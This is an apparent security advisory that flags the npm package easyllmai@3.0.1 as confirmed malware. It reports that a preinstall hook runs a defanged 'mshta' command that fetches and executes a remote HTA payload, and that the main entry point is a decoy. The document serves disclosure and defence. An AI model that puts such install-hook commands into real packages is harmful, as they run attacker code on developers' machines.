LWA-2026-5563 MAL-2026-5895 ↗ confirmed malware

easyllmai@3.0.1

Malicious code in easyllmai (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1059.003 · Windows Command ShellT1218.005 · MshtaT1105 · Ingress Tool Transfer

Analysis

easyllmai@3.0.1 uses its preinstall lifecycle hook to download and execute arbitrary remote code. On install, preinstall.js runs 'cmd /c "mshta hxxp://fixars[.]top"' which fetches and executes an HTA payload from fixars[.]top using the Windows Mshta LOLBin. The package's main entry (index.js) is a harmless decoy greeting function; the malicious behaviour occurs during installation, before any require().

analyzed by
Leitwacht
first seen
Jun 16, 2026, 12:00 PM
analyzed
Jun 16, 2026, 12:01 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.